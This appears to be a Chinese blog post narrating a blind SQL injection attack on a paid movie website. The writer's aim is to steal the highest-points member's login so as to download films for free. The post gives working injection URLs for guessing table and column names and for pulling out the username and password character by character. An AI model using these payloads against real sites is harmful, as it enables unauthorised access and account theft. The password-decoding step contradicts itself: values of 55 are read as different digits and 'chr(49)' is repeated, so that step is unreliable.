这几天闲得无聊，想上网down几部电影来看，找了找都是要money的，不爽，花时间跑去汇钱还不如找个有漏洞的黑一黑。于是，计划开始： 
(为避免不必要的误会，网址、用户名、密码做了一些修改，不过方法是100％原汁原味) 

1.寻找入口 
准备：如果你以前没尝试过sql注入攻击，那应该把http友好提示关闭，这样才能让你清楚看到服务器端返回的提示信息。 
尝试几个有传入参数的页面，逐个测试是否有sql注入漏洞，识别方法为：把网址栏的id=***x加个'号，或在表单输入'号，如果提示表达式错误，表示有漏洞可注入，另外，通过这个方式可以得到程序所用的数据库类型。 
经测试，发现有几个页面有注入漏洞，决定从http://www.movie.com/movie.asp?id=1000入手，输入http://www.movie.com/movie.asp?id=1000'，得到信息：数据库用是的access，提示articleid=1000'附近有表达式错误，嘿，原来是个用文章系统改出来的电影站。 

2.观察网站环境 
网站提供的功能有：影片分类、影片介绍、影片搜索，影片的id大概从1000-1500之间。 

3.猜表名 
查清楚敌人情况之后，开始行动，行动的第一步都是从猜表名开始，http://www.movie.com/movie.asp?id=1000，把1000改成(select count(1) from user)，那么，他原来的sql语句将会变成： 
select [字段列表] from [影片表] where 影片id=(select count(1) from user) 
如果猜对表名，将有可能出现下面三种情况： 
a.显示某部影片的信息（巧合的情况） 
b.显示影片找不到（如果有判断是否为eof） 
c.提示错误信息（eof or bof） 
如果猜错，将会直接提示找不到表名。 
把user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu这些常用表名一个个放进去试，一般成功率都不低于80% 
结果，成功猜中该网站的用户名表名为users 

4.猜列名 
至于猜列名，不用我介绍大家都应该清楚怎么做了，把(select count(1) from users)改成(select count(id) from users)，如没提示"找不到字段"就表示字段名是正确的，字段一般不用太费力，在login的时候看看表单的名称就大概可以猜到一些了。 
果然，这个网站也不例外，用户表中字段为id(数字)，userid(文本)，password（文本），积分字段猜得比较费劲，为money 

5.锁定目标 
让users表只返回money最多的一个记录，以便进行猜解、并避免猜中一些没money的用户名： 
http://www.movie.com/movie.asp?id=(select 1000 from user where money>1000) 结果：提示子查询不能返回两条以上记录 
锁定>10000，提示不变； 
锁定>100000，提示找不到记录，说明没有积分大于10万的用户； 
从1万到10万逐步缩小范围，得知积分大于25500只有一条记录。 

6.计算用户名及密码长度 
因为影片的id大概从1000-1500之间，可以用userid的长度+1000得出的数（即影片id）计算用户名长度，键入： 
http://www.movie.com/movie.asp?id=(select len(userid) %2b 1000 from user where money>25500) 

%2b是什么？因为地址栏的+号request出来会变成空格，所以+号要用urlencode过的%2b表示。 

结果返回片名为《双雄》的影片，呵呵，怎么办？不是有搜索功能吗？拿去搜一下，看看影片id是多少吧。 
搜索，得出影片id是1006，显然，用户名长度为1006-1000=6；同样方法，得出密码的长度为8 

7.分步破解用户名 
有点sql应用经验的人应该都想到方法了，来，敲入： 
http://www.movie.com/movie.asp?id=(select asc(mid(userid,1,1)) %2b 1000 from user where money>25500) 
呵呵，又返回一部影片，搜索一下，影片id为1104，即asc(mid(userid,1,1))=104 
同样方法，得出： 
asc(mid(userid,2,1))=117 
asc(mid(userid,3,1))=97 
asc(mid(userid,4,1))=106 
asc(mid(userid,5,1))=105 
asc(mid(userid,6,1))=101 
因为len(userid)=6，所以算到第6位就行了，查asc对应表（会编程的可以写几句话算出来），chr(104)=h，chr(117)=u，chr(97)=a，chr(106)=j，chr(105)=i，chr(101)=e 
连起来，用户名就是huajie 

8.同样的方法破解密码 
asc(mid(password,1,1))=49 => chr(49)=1 
asc(mid(password,2,1))=57 => chr(49)=9 
asc(mid(password,3,1))=55 => chr(49)=7 
asc(mid(password,4,1))=56 => chr(49)=8 
asc(mid(password,5,1))=48 => chr(49)=0 
asc(mid(password,6,1))=55 => chr(49)=7 
asc(mid(password,7,1))=55 => chr(49)=1 
asc(mid(password,8,1))=55 => chr(49)=2 
拼起来：19780712，哈哈，又是用生日做密码的！ 


接下来，输入用户名和密码，登录系统，成功！猜表名列表之前用了30分钟，破解用了15分钟，45分钟搞掂了一个站。接下来做什么？当然是先down几g的电影下来再说了。 

<